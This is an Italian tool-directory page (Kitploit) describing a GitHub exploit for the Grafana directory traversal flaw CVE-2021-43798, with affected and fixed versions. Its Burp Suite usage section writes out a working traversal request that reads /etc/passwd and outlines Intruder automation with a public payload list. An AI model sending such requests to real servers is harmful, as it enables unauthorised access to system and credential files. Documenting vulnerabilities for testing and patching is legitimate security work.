Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-43798 — Exploit per directory traversal di Grafana (CVE-2021-43798) con integrazione con Burp Suite e automazione del payload per l'accesso ai file locali su istanze vulnerabili. | Kitploit
Strumenti/GitHubGitHub/iris288/cve-2021-43798
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubiris288/cve-2021-43798

CVE-2021-43798

Exploit per directory traversal di Grafana (CVE-2021-43798) con integrazione con Burp Suite e automazione del payload per l'accesso ai file locali su istanze vulnerabili.

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-43798

Le versioni di Grafana 8.0.0-beta1 fino a 8.3.0 (eccetto le versioni corrette) sono vulnerabili a directory traversal, consentendo l'accesso a file locali.

Grafana è una piattaforma open-source per il monitoraggio e l'osservabilità. Le versioni di Grafana 8.0.0-beta1 fino a 8.3.0 (eccetto le versioni corrette) sono vulnerabili a directory traversal, consentendo l'accesso a file locali. Il percorso URL vulnerabile è: <grafana_host_url>/public/plugins//, dove è l'ID del plugin per qualsiasi plugin installato. Grafana Cloud non è mai stato vulnerabile. Si consiglia agli utenti di aggiornare alle versioni corrette 8.0.7, 8.1.8, 8.2.7 o 8.3.1. L'avviso di sicurezza di GitHub contiene ulteriori informazioni sui percorsi URL vulnerabili, sulla mitigazione e sulla tempistica della divulgazione.

Utilizzo di Burp Suite

Send GET to repeater

GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1

Then send to intruder GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1

Using Sniper to ATTACK Payload copiato da github https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal

Elaborazione del payload Match [{FILE}] replace with {flag.txt}

Scarica lo strumento